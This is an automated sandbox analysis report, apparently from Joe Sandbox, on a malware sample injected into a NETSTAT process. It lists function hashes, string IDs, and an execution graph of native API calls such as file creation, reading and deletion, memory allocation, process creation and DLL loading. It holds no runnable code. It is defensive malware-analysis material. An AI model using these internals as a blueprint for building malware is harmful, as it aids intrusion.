                                                      • Opcode ID: 5ed0058f9f4c1a1418e57778257814aedc4a0eb7b29c996c5648fb320b9da6cb
                                                      • Instruction ID: 54cc37f07ee2ccdbebb9c725e1ac6364707de494d57e17a0f7f49ddc10c0885c
                                                      • Opcode Fuzzy Hash: 5ed0058f9f4c1a1418e57778257814aedc4a0eb7b29c996c5648fb320b9da6cb
                                                      • Instruction Fuzzy Hash: E3317E71A11119BAEB01EB90CD42FEF777DAF55B40F104059FB00AB180E7B56A028BF6
                                                      Function 02FB7E39 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2$3$4$9
                                                      • API String ID: 0-2062807800
                                                      • Opcode ID: eedecaed4c46782e0038a77bdf983cf57e39231a6cd75073988ad1010defb064
                                                      • Instruction ID: c0a86ef1446406d3ed934bced19086fc683a80a39cd05d30f355c64f46811fcc
                                                      • Opcode Fuzzy Hash: eedecaed4c46782e0038a77bdf983cf57e39231a6cd75073988ad1010defb064
                                                      • Instruction Fuzzy Hash: 1C3171B1D00109ABEB00DFE4DD41BEEB3B9EF44344F104099EA04AB240E7B5AA058BE5
                                                      Function 02FB28F5 Relevance: 5.1, Strings: 4, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2M9L$4139$41392M9L$41392M9L
                                                      • API String ID: 0-802357084
                                                      • Opcode ID: f2f06f4055ec55d0939464221b968211078e84cc7ace67b5d94740b01fc74d70
                                                      • Instruction ID: f89423dc1695313aff10adeaf9e2f6d41d33af37bae1e92b1c0e10ef82f9acf7
                                                      • Opcode Fuzzy Hash: f2f06f4055ec55d0939464221b968211078e84cc7ace67b5d94740b01fc74d70
                                                      • Instruction Fuzzy Hash: 3001C4B2D4121D7ADB11ABE59C81DEFBB7CEF456D4F048068FB04AB140D6285E068FB2
                                                      Function 02FB28C5 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2M9L$4139$41392M9L$41392M9L
                                                      • API String ID: 0-802357084
                                                      • Opcode ID: b5455ddb34965fc3d5f9ad89c7ac4ae6f5a50f54c0de38243e1a5172f6207e5a
                                                      • Instruction ID: 37e8468b247d91f95a60eb6a42964dd13ded8c8f56fbee416e00f293e0be1da9
                                                      • Opcode Fuzzy Hash: b5455ddb34965fc3d5f9ad89c7ac4ae6f5a50f54c0de38243e1a5172f6207e5a
                                                      • Instruction Fuzzy Hash: EE01F772E45158778B128A959D819EDBB6CEF41198B04C0E9EF18DB200E7264A069BE2

                                                      Execution Graph

                                                      Execution Coverage:2.5%
                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                      Signature Coverage:2.2%
                                                      Total number of Nodes:460
                                                      Total number of Limit Nodes:71
                                                      execution_graph 101322 3058987 101324 305898a 101322->101324 101323 3058941 101324->101323 101326 30570d0 LdrInitializeThunk LdrInitializeThunk 101324->101326 101326->101323 101327 3932ad0 LdrInitializeThunk 101328 3049b80 101329 3049f53 101328->101329 101330 304a446 101329->101330 101332 306b220 101329->101332 101333 306b246 101332->101333 101338 3044180 101333->101338 101335 306b252 101336 306b28b 101335->101336 101341 30657e0 101335->101341 101336->101330 101340 304418d 101338->101340 101345 3053320 101338->101345 101340->101335 101342 3065841 101341->101342 101344 306584e 101342->101344 101369 3051ae0 101342->101369 101344->101336 101346 305333d 101345->101346 101348 3053356 101346->101348 101349 3069f50 101346->101349 101348->101340 101351 3069f6a 101349->101351 101350 3069f99 101350->101348 101351->101350 101356 3068ba0 101351->101356 101357 3068bbd 101356->101357 101363 3932c0a 101357->101363 101358 3068be9 101360 306b5c0 101358->101360 101366 30698b0 101360->101366 101362 306a012 101362->101348 101364 3932c11 101363->101364 101365 3932c1f LdrInitializeThunk 101363->101365 101364->101358 101365->101358 101367 30698ca 101366->101367 101368 30698db RtlFreeHeap 101367->101368 101368->101362 101370 3051b1b 101369->101370 101385 3057ff0 101370->101385 101372 3051b23 101383 3051df3 101372->101383 101396 306b6a0 101372->101396 101374 3051b39 101375 306b6a0 RtlAllocateHeap 101374->101375 101376 3051b4a 101375->101376 101377 306b6a0 RtlAllocateHeap 101376->101377 101378 3051b58 101377->101378 101384 3051bef 101378->101384 101407 3056b40 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101378->101407 101381 3051da2 101403 3068120 101381->101403 101383->101344 101399 3054660 101384->101399 101386 305801c 101385->101386 101408 3057ee0 101386->101408 101389 3058061 101391 305807d 101389->101391 101394 3069540 NtClose 101389->101394 101390 3058049 101392 3058054 101390->101392 101414 3069540 101390->101414 101391->101372 101392->101372 101395 3058073 101394->101395 101395->101372 101422 3069860 101396->101422 101398 306b6bb 101398->101374 101401 3054684 101399->101401 101400 305468b 101400->101381 101401->101400 101402 30546c6 LdrLoadDll 101401->101402 101402->101400 101404 3068182 101403->101404 101406 306818f 101404->101406 101425 3051e10 101404->101425 101406->101383 101407->101384 101409 3057fd6 101408->101409 101410 3057efa 101408->101410 101409->101389 101409->101390 101417 3068c40 101410->101417 101413 3069540 NtClose 101413->101409 101415 306955d 101414->101415 101416 306956e NtClose 101415->101416 101416->101392 101418 3068c5d 101417->101418 101421 39335c0 LdrInitializeThunk 101418->101421 101419 3057fca 101419->101413 101421->101419 101423 306987d 101422->101423 101424 306988e RtlAllocateHeap 101423->101424 101424->101398 101428 3051e30 101425->101428 101441 30582c0 101425->101441 101427 3052396 101427->101406 101428->101427 101445 30612e0 101428->101445 101431 305204a 101453 306c8b0 101431->101453 101432 3051e8e 101432->101427 101448 306c780 101432->101448 101435 305205f 101437 30520af 101435->101437 101459 3050930 101435->101459 101437->101427 101438 3050930 LdrInitializeThunk 101437->101438 101462 3058260 101437->101462 101438->101437 101439 3052203 101439->101437 101440 3058260 LdrInitializeThunk 101439->101440 101440->101439 101442 30582cd 101441->101442 101443 30582f5 101442->101443 101444 30582ee SetErrorMode 101442->101444 101443->101428 101444->101443 101447 3061301 101445->101447 101466 306b530 101445->101466 101447->101432 101449 306c796 101448->101449 101450 306c790 101448->101450 101451 306b6a0 RtlAllocateHeap 101449->101451 101450->101431 101452 306c7bc 101451->101452 101452->101431 101454 306c820 101453->101454 101455 306b6a0 RtlAllocateHeap 101454->101455 101456 306c87d 101454->101456 101457 306c85a 101455->101457 101456->101435 101458 306b5c0 RtlFreeHeap 101457->101458 101458->101456 101460 3050952 101459->101460 101473 30697c0 101459->101473 101460->101439 101463 3058273 101462->101463 101478 3068aa0 101463->101478 101465 305829e 101465->101437 101469 30696a0 101466->101469 101468 306b561 101468->101447 101470 3069732 101469->101470 101472 30696cb 101469->101472 101471 3069748 NtAllocateVirtualMemory 101470->101471 101471->101468 101472->101468 101474 30697dd 101473->101474 101477 3932c70 LdrInitializeThunk 101474->101477 101475 3069805 101475->101460 101477->101475 101479 3068b1b 101478->101479 101481 3068acb 101478->101481 101483 3932dd0 LdrInitializeThunk 101479->101483 101480 3068b40 101480->101465 101481->101465 101483->101480 101484 304b640 101485 306b530 NtAllocateVirtualMemory 101484->101485 101486 304ccb1 101485->101486 101487 3059d80 101488 3059d8f 101487->101488 101489 3059d96 101488->101489 101490 306b5c0 RtlFreeHeap 101488->101490 101490->101489 101491 305c780 101493 305c7a9 101491->101493 101492 305c8ad 101493->101492 101494 305c853 FindFirstFileW 101493->101494 101494->101492 101496 305c86e 101494->101496 101495 305c894 FindNextFileW 101495->101496 101497 305c8a6 FindClose 101495->101497 101496->101495 101497->101492 101498 3057480 101499 3057498 101498->101499 101501 30574f2 101498->101501 101499->101501 101502 305b410 101499->101502 101503 305b436 101502->101503 101504 305b669 101503->101504 101529 3069940 101503->101529 101504->101501 101506 305b4ac 101506->101504 101507 306c8b0 2 API calls 101506->101507 101508 305b4cb 101507->101508 101508->101504 101509 305b5a2 101508->101509 101510 3068ba0 LdrInitializeThunk 101508->101510 101512 3055c50 LdrInitializeThunk 101509->101512 101513 305b5c1 101509->101513 101511 305b52d 101510->101511 101511->101509 101515 305b536 101511->101515 101512->101513 101528 305b651 101513->101528 101535 3068710 101513->101535 101514 3058260 LdrInitializeThunk 101518 305b598 101514->101518 101515->101504 101522 305b58a 101515->101522 101524 305b568 101515->101524 101532 3055c50 101515->101532 101518->101501 101519 3058260 LdrInitializeThunk 101523 305b65f 101519->101523 101521 305b628 101540 30687c0 101521->101540 101522->101514 101523->101501 101550 3064960 LdrInitializeThunk 101524->101550 101526 305b642 101545 3068920 101526->101545 101528->101519 101530 306995a 101529->101530 101531 306996b CreateProcessInternalW 101530->101531 101531->101506 101551 3068d70 101532->101551 101534 3055c8e 101534->101524 101536 306878a 101535->101536 101537 306873b 101535->101537 101557 39339b0 LdrInitializeThunk 101536->101557 101537->101521 101538 30687af 101538->101521 101541 306883a 101540->101541 101543 30687eb 101540->101543 101558 3934340 LdrInitializeThunk 101541->101558 101542 306885f 101542->101526 101543->101526 101546 306899d 101545->101546 101547 306894e 101545->101547 101559 3932fb0 LdrInitializeThunk 101546->101559 101547->101528 101548 30689c2 101548->101528 101550->101522 101552 3068e1a 101551->101552 101554 3068d9b 101551->101554 101556 3932d10 LdrInitializeThunk 101552->101556 101553 3068e5f 101553->101534 101554->101534 101556->101553 101557->101538 101558->101542 101559->101548 101560 3069240 101561 30692f4 101560->101561 101562 306926f 101560->101562 101563 306930a NtCreateFile 101561->101563 101564 3052888 101565 30528a8 101564->101565 101568 30563e0 101565->101568 101567 30528b3 101569 3056413 101568->101569 101570 3056437 101569->101570 101575 30690a0 101569->101575 101570->101567 101572 305645a 101572->101570 101573 3069540 NtClose 101572->101573 101574 30564da 101573->101574 101574->101567 101576 30690bd 101575->101576 101579 3932ca0 LdrInitializeThunk 101576->101579 101577 30690e9 101577->101572 101579->101577 101580 304da56 101582 30563e0 2 API calls 101580->101582 101584 30564e8 101580->101584 101581 304da5c 101582->101581 101585 30564c3 101584->101585 101586 30564ef 101584->101586 101587 3069540 NtClose 101585->101587 101588 30564da 101587->101588 101588->101581 101589 305f9d0 101590 305fa34 101589->101590 101591 30563e0 2 API calls 101590->101591 101593 305fb67 101591->101593 101592 305fb6e 101593->101592 101620 30564f0 101593->101620 101597 305fc0e 101598 305fd22 101597->101598 101629 305f7b0 101597->101629 101599 3069540 NtClose 101598->101599 101601 305fd2c 101599->101601 101602 305fc26 101602->101598 101603 305fc31 101602->101603 101604 306b6a0 RtlAllocateHeap 101603->101604 101605 305fc5a 101604->101605 101606 305fc63 101605->101606 101607 305fc79 101605->101607 101608 3069540 NtClose 101606->101608 101638 305f6a0 CoInitialize 101607->101638 101611 305fc6d 101608->101611 101610 305fc87 101641 3069000 101610->101641 101613 305fd02 101614 3069540 NtClose 101613->101614 101616 305fd0c 101614->101616 101615 305fca5 101615->101613 101619 3069000 LdrInitializeThunk 101615->101619 101617 306b5c0 RtlFreeHeap 101616->101617 101618 305fd13 101617->101618 101619->101615 101621 3056515 101620->101621 101645 3068eb0 101621->101645 101624 3067080 101625 30670e5 101624->101625 101626 3067118 101625->101626 101650 30605b9 RtlFreeHeap 101625->101650 101626->101597 101628 30670fa 101628->101597 101630 305f7cc 101629->101630 101631 3054660 LdrLoadDll 101630->101631 101633 305f7ea 101631->101633 101632 305f7f3 101632->101602 101633->101632 101634 3054660 LdrLoadDll 101633->101634 101635 305f8be 101634->101635 101636 3054660 LdrLoadDll 101635->101636 101637 305f918 101635->101637 101636->101637 101637->101602 101640 305f705 101638->101640 101639 305f79b CoUninitialize 101639->101610 101640->101639 101642 306901a 101641->101642 101651 3932ba0 LdrInitializeThunk 101642->101651 101643 306904a 101643->101615 101646 3068ecd 101645->101646 101649 3932c60 LdrInitializeThunk 101646->101649 101647 3056589 101647->101618 101647->101624 101649->101647 101650->101628 101651->101643 101652 3055cd0 101653 3058260 LdrInitializeThunk 101652->101653 101654 3055d00 101652->101654 101653->101654 101657 30581e0 101654->101657 101656 3055d25 101658 3058224 101657->101658 101659 3058245 101658->101659 101664 3068870 101658->101664 101659->101656 101661 3058235 101662 3058251 101661->101662 101663 3069540 NtClose 101661->101663 101662->101656 101663->101659 101665 30688ea 101664->101665 101667 306889b 101664->101667 101669 3934650 LdrInitializeThunk 101665->101669 101666 306890f 101666->101661 101667->101661 101669->101666 101670 3061910 101671 306192c 101670->101671 101672 3061954 101671->101672 101673 3061968 101671->101673 101674 3069540 NtClose 101672->101674 101675 3069540 NtClose 101673->101675 101676 306195d 101674->101676 101677 3061971 101675->101677 101680 306b6e0 RtlAllocateHeap 101677->101680 101679 306197c 101680->101679 101681 3068b50 101682 3068b6a 101681->101682 101685 3932df0 LdrInitializeThunk 101682->101685 101683 3068b92 101685->101683 101691 30689d0 101692 3068a5f 101691->101692 101694 30689fe 101691->101694 101696 3932ee0 LdrInitializeThunk 101692->101696 101693 3068a90 101696->101693 101697 3053213 101698 3057ee0 2 API calls 101697->101698 101700 3053223 101698->101700 101699 305323f 101700->101699 101701 3069540 NtClose 101700->101701 101701->101699 101702 3066250 101703 30662aa 101702->101703 101705 30662b7 101703->101705 101706 3063c60 101703->101706 101707 306b530 NtAllocateVirtualMemory 101706->101707 101709 3063ca1 101707->101709 101708 3063dae 101708->101705 101709->101708 101710 3054660 LdrLoadDll 101709->101710 101712 3063ce7 101710->101712 101711 3063d30 Sleep 101711->101712 101712->101708 101712->101711 101713 30602d0 101714 30602ed 101713->101714 101715 3054660 LdrLoadDll 101714->101715 101716 306030b 101715->101716 101717 3067080 RtlFreeHeap 101716->101717 101718 3060495 101716->101718 101717->101718 101720 3049b20 101722 3049b2f 101720->101722 101721 3049b70 101722->101721 101723 3049b5d CreateThread 101722->101723 101724 3050ea0 101725 3050eba 101724->101725 101726 3054660 LdrLoadDll 101725->101726 101727 3050ed8 101726->101727 101728 3050f0c PostThreadMessageW 101727->101728 101729 3050f1d 101727->101729 101728->101729 101730 30572a0 101731 30572bc 101730->101731 101735 305730f 101730->101735 101732 3069540 NtClose 101731->101732 101731->101735 101734 30572d7 101732->101734 101733 3057447 101740 3056670 NtClose LdrInitializeThunk LdrInitializeThunk 101734->101740 101735->101733 101741 3056670 NtClose LdrInitializeThunk LdrInitializeThunk 101735->101741 101737 3057421 101737->101733 101742 3056840 NtClose LdrInitializeThunk LdrInitializeThunk 101737->101742 101740->101735 101741->101737 101742->101733 101743 305aee0 101748 305abd0 101743->101748 101745 305aeed 101762 305a840 101745->101762 101747 305af09 101749 305abf5 101748->101749 101773 30584d0 101749->101773 101752 305ad46 101752->101745 101754 305ad5d 101754->101745 101755 305ad54 101755->101754 101757 305ae58 101755->101757 101792 305a290 101755->101792 101759 305aebd 101757->101759 101801 305a600 101757->101801 101760 306b5c0 RtlFreeHeap 101759->101760 101761 305aec4 101760->101761 101761->101745 101763 305a856 101762->101763 101766 305a861 101762->101766 101764 306b6a0 RtlAllocateHeap 101763->101764 101764->101766 101765 305a888 101765->101747 101766->101765 101767 30584d0 GetFileAttributesW 101766->101767 101768 305aba2 101766->101768 101771 305a290 RtlFreeHeap 101766->101771 101772 305a600 RtlFreeHeap 101766->101772 101767->101766 101769 305abbb 101768->101769 101770 306b5c0 RtlFreeHeap 101768->101770 101769->101747 101770->101769 101771->101766 101772->101766 101774 30584f1 101773->101774 101775 3058503 101774->101775 101776 30584f8 GetFileAttributesW 101774->101776 101775->101752 101777 3063540 101775->101777 101776->101775 101778 306354e 101777->101778 101779 3063555 101777->101779 101778->101755 101780 3054660 LdrLoadDll 101779->101780 101781 306358a 101780->101781 101782 3063599 101781->101782 101805 3063000 LdrLoadDll 101781->101805 101783 306b6a0 RtlAllocateHeap 101782->101783 101788 3063744 101782->101788 101785 30635b2 101783->101785 101786 306373a 101785->101786 101785->101788 101789 30635ce 101785->101789 101787 306b5c0 RtlFreeHeap 101786->101787 101786->101788 101787->101788 101788->101755 101789->101788 101790 306b5c0 RtlFreeHeap 101789->101790 101791 306372e 101790->101791 101791->101755 101793 305a2b6 101792->101793 101806 305dcf0 101793->101806 101795 305a328 101797 305a4b0 101795->101797 101798 305a346 101795->101798 101796 305a495 101796->101755 101797->101796 101799 305a150 RtlFreeHeap 101797->101799 101798->101796 101810 305a150 101798->101810 101799->101797 101802 305a626 101801->101802 101803 305dcf0 RtlFreeHeap 101802->101803 101804 305a6ad 101803->101804 101804->101757 101805->101782 101807 305dd14 101806->101807 101808 306b5c0 RtlFreeHeap 101807->101808 101809 305dd21 101807->101809 101808->101809 101809->101795 101811 305a16d 101810->101811 101814 305dd70 101811->101814 101813 305a273 101813->101798 101815 305dd94 101814->101815 101816 305de3e 101815->101816 101817 306b5c0 RtlFreeHeap 101815->101817 101816->101813 101817->101816 101823 3061ca0 101824 3061cb9 101823->101824 101825 3061d04 101824->101825 101828 3061d47 101824->101828 101830 3061d4c 101824->101830 101826 306b5c0 RtlFreeHeap 101825->101826 101827 3061d14 101826->101827 101829 306b5c0 RtlFreeHeap 101828->101829 101829->101830 101831 30694a0 101832 3069517 101831->101832 101834 30694ce 101831->101834 101833 306952d NtDeleteFile 101832->101833 101837 30523b0 101838 3068ba0 LdrInitializeThunk 101837->101838 101839 30523e6 101838->101839 101842 30695d0 101839->101842 101841 30523fb 101843 306965f 101842->101843 101845 30695fe 101842->101845 101847 3932e80 LdrInitializeThunk 101843->101847 101844 3069690 101844->101841 101845->101841 101847->101844 101848 3056eb0 101849 3056eda 101848->101849 101852 3058090 101849->101852 101851 3056f04 101853 30580ad 101852->101853 101859 3068c90 101853->101859 101855 30580fd 101856 3058104 101855->101856 101857 3068d70 LdrInitializeThunk 101855->101857 101856->101851 101858 305812d 101857->101858 101858->101851 101860 3068cbb 101859->101860 101861 3068d28 101859->101861 101860->101855 101864 3932f30 LdrInitializeThunk 101861->101864 101862 3068d61 101862->101855 101864->101862 101865 3065b70 101866 3065bd5 101865->101866 101867 3065c0c 101866->101867 101870 3061350 101866->101870 101869 3065bee 101871 306135e 101870->101871 101872 30613de 101871->101872 101884 30693b0 101871->101884 101872->101869 101874 30614f5 101878 3069540 NtClose 101874->101878 101875 30614e0 101877 3069540 NtClose 101875->101877 101876 30614c2 101876->101874 101876->101875 101879 30614e9 101877->101879 101881 30614fe 101878->101881 101879->101869 101880 3061535 101880->101869 101881->101880 101882 306b5c0 RtlFreeHeap 101881->101882 101883 3061529 101882->101883 101883->101869 101885 3069457 101884->101885 101887 30693de 101884->101887 101886 306946d NtReadFile 101885->101886 101886->101876 101887->101876

                                                      Executed Functions

                                                      Function 03049B80 Relevance: 34.2, Strings: 27, Instructions: 490COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 31 3049b80-3049f51 32 3049f62-3049f6e 31->32 33 3049f53-3049f5c 31->33 34 3049f70-3049f80 32->34 35 3049f82-3049f8c 32->35 33->32 34->33 36 3049f9d-3049fa9 35->36 37 3049fbf-3049fc9 36->37 38 3049fab-3049fbd 36->38 39 3049fda-3049fe6 37->39 38->36 41 3049ffc-304a003 39->41 42 3049fe8-3049ffa 39->42 43 304a005-304a016 41->43 44 304a02c-304a030 41->44 42->39 46 304a01d-304a01f 43->46 47 304a018-304a01c 43->47 48 304a054-304a05b 44->48 49 304a032-304a052 44->49 51 304a021-304a027 46->51 52 304a02a 46->52 47->46 50 304a062-304a069 48->50 49->44 53 304a09b-304a0a5 50->53 54 304a06b-304a099 50->54 51->52 52->41 55 304a0b6-304a0c2 53->55 54->50 56 304a0c4-304a0d0 55->56 57 304a0d2-304a0dc 55->57 56->55 59 304a0ed-304a0f6 57->59 60 304a106-304a117 59->60 61 304a0f8-304a104 59->61 63 304a128-304a134 60->63 61->59 64 304a136-304a148 63->64 65 304a14a-304a153 63->65 64->63 66 304a3de-304a3e5 65->66 67 304a159-304a15c 65->67 70 304a3e7-304a3fd 66->70 71 304a40a-304a411 66->71 69 304a162-304a166 67->69 72 304a18e-304a195 69->72 73 304a168-304a171 69->73 74 304a3ff-304a405 70->74 75 304a408 70->75 76 304a480-304a487 71->76 77 304a413-304a41c 71->77 82 304a1c6-304a1ca 72->82 83 304a197-304a1c4 72->83 78 304a173-304a177 73->78 79 304a178-304a18c 73->79 74->75 75->66 80 304a4b9-304a4bf 76->80 81 304a489-304a4b7 76->81 84 304a441 call 306b220 77->84 85 304a41e-304a43f 77->85 78->79 79->69 87 304a4c1-304a4d9 80->87 88 304a4db-304a4e5 80->88 81->76 89 304a1f2-304a1f9 82->89 90 304a1cc-304a1d5 82->90 83->72 91 304a446-304a450 84->91 85->77 87->80 94 304a21a-304a21e 89->94 95 304a1fb-304a218 89->95 92 304a1d7-304a1db 90->92 93 304a1dc-304a1f0 90->93 96 304a461-304a46d 91->96 92->93 93->82 97 304a247-304a24e 94->97 98 304a220-304a245 94->98 95->89 96->76 101 304a46f-304a47e 96->101 99 304a285-304a28c 97->99 100 304a250-304a283 97->100 98->94 102 304a297-304a29e 99->102 100->97 101->96 104 304a2a0-304a2d0 102->104 105 304a2d2-304a2e1 102->105 104->102 107 304a2e3-304a2ea 105->107 108 304a32a-304a334 105->108 109 304a325 107->109 110 304a2ec-304a300 107->110 111 304a345-304a351 108->111 109->66 112 304a307-304a323 110->112 113 304a302-304a306 110->113 114 304a353-304a35c 111->114 115 304a369-304a373 111->115 112->107 113->112 117 304a367 114->117 118 304a35e-304a364 114->118 116 304a384-304a38d 115->116 120 304a39d-304a3a3 116->120 121 304a38f-304a39b 116->121 117->111 118->117 123 304a3a7-304a3ab 120->123 121->116 124 304a3ad-304a3d7 123->124 125 304a3d9 123->125 124->123 125->65
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: u$G$($-8$0L$4Q$5+$67$:$:k5+$;$=$@9$C--8$J$Q$T$U$Vx$W$Y$^$``$b$pB$w${
                                                      • API String ID: 0-2348033831
                                                      • Opcode ID: a9d9191015d3eacfe7ea2774ad8d165edea2daefa97897544a324c105c975e8a
                                                      • Instruction ID: 074b087d92288b15b83305b9d0f2f0ac2483ab68dd57e6ee0b1b9ce9041357b8
                                                      • Opcode Fuzzy Hash: a9d9191015d3eacfe7ea2774ad8d165edea2daefa97897544a324c105c975e8a
                                                      • Instruction Fuzzy Hash: 7D42D5B0E46228CFEB24CF59C894BDDBBB1BB84308F1085E9D00D6B291D7B95A85CF55
                                                      Function 0305C780 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0305C864
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0305C89F
                                                      • FindClose.KERNELBASE(?), ref: 0305C8AA
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: afebcd096fb5cbe9345ddb507faedf167d37da165dfd3dea86cc339ad10eb741
                                                      • Instruction ID: eaee0cb6ebd6f2fdca477372b3c7fbb0b68872feb22766214ecb6381e295ee9d
                                                      • Opcode Fuzzy Hash: afebcd096fb5cbe9345ddb507faedf167d37da165dfd3dea86cc339ad10eb741
                                                      • Instruction Fuzzy Hash: 443176B59013087BEB64DF60CC85FFF77BCDF84754F144559B908AB180EA74AA848BA0
                                                      Function 03069240 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0306933B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 96481b07a0cda4c73462c0131a6270748126078e6bfbff863e1c81d70d13cbdc
                                                      • Instruction ID: fb23d6847c84ebd9fa76c89cc265af535808c43f9175e45bc07097ef372015c4
                                                      • Opcode Fuzzy Hash: 96481b07a0cda4c73462c0131a6270748126078e6bfbff863e1c81d70d13cbdc
                                                      • Instruction Fuzzy Hash: 6031C3B5A01248AFDB14DF98D881EEFB7F9EF88310F108219F919A7344D774A951CBA1
                                                      Function 030693B0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(00000000,?,?,?,?,00000000,00000000,00000000,?), ref: 03069496
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 5d324f2de9b0bdc292b076fbbb4fc14851e6e6c422cf67df24d7c93528720459
                                                      • Instruction ID: 3b728b10f4590274c8f130221882bb544f38a38f8ad163da65c7ebde1604037c
                                                      • Opcode Fuzzy Hash: 5d324f2de9b0bdc292b076fbbb4fc14851e6e6c422cf67df24d7c93528720459
                                                      • Instruction Fuzzy Hash: 3731F8B5A01208AFDB14DF98D880EEF77F9EF8C314F108219F918AB244D674A941CBA1
                                                      Function 030696A0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(03051E8E,?,0306818F,00000000,00000004,00003000,?,?,?,?,?,0306818F,03051E8E), ref: 03069765
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 2ff54859743f0e75b1bce2d868ce9d863c027bd32c74298cdf015438bdccce6a
                                                      • Instruction ID: 8e869eee6d4980097022eae9e5608ecde912aff860726e84a5b48380862c18c6
                                                      • Opcode Fuzzy Hash: 2ff54859743f0e75b1bce2d868ce9d863c027bd32c74298cdf015438bdccce6a
                                                      • Instruction Fuzzy Hash: 6A2128B5A01708AFDB14DF98DC81EEFB7B9EF88710F108119F918AB244D774A951CBA1
                                                      Function 030694A0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: cf00df1e9b3e13202d80378ec7fa8627bc819169e84eb9ca6fd6a41da5ee3b37
                                                      • Instruction ID: 8eaa9b024993cf4ee14627b82418a6798cacacced8b22b3a964631dce9632863
                                                      • Opcode Fuzzy Hash: cf00df1e9b3e13202d80378ec7fa8627bc819169e84eb9ca6fd6a41da5ee3b37
                                                      • Instruction Fuzzy Hash: 8811A0756417047AD620EB68CC41FEF77ACDFC5710F008559F918AB280D7747A05C7A1
                                                      Function 03069540 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03069577
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
